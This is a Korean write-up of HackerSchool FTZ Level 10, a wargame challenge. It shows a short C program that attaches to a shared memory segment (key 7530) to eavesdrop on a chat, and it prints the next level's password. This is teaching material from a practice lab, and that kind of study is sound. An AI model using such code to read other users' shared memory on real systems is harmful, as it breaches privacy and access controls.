HackerSchool FTZ Level10 WriteUp

---

HackerSchool FTZ Level 10 WriteUp

---

두 명의 사용자가 대화방을 이용하여 비밀스러운 대화를 나누고 있다.
그 대화방은 공유 메모리를 이용하여 만들어졌으며,
key_t의 값은 7530이다. 이를 이용해 두 사람의 대화를 도청하여
level11의 권한을 얻어라.

- 레벨을 완료하셨다면 소스는 지우고 나가주세요.

 IPC 자원 목록(공유 메모리, 세마포어, 메시지 큐)을 조회하는 icps 명령어를 사용해보자.

0x00001d6a(16) = 7530(10)

key가 7530인 공유 메모리가 있는 것을 확인할 수 있다.

이제 /tmp 디렉토리에서 정보를 이용해 코드를 작성하고 컴파일해보자.

#include <stdio.h>
#include <sys/ipc.h>
#include <sys/shm.h>

main()
{
	int i;
	char *j;

	i = shmget(7530,1028,IPC_CREAT|0666); // 공유 메모리의 ID를 받고
	j = shmat(i,NULL,0); // 프로세스를 공유 메모리에 연결한다.

	printf("%s",j); // 공유 메모리 내용을 출력한다.
}

코드를 실행시켜보자.

what!@#$?

멍멍: level11의 패스워드는?
구타: what!@#$?

비밀번호를 알아냈으니 로그인해보자.

level11에 로그인되었다.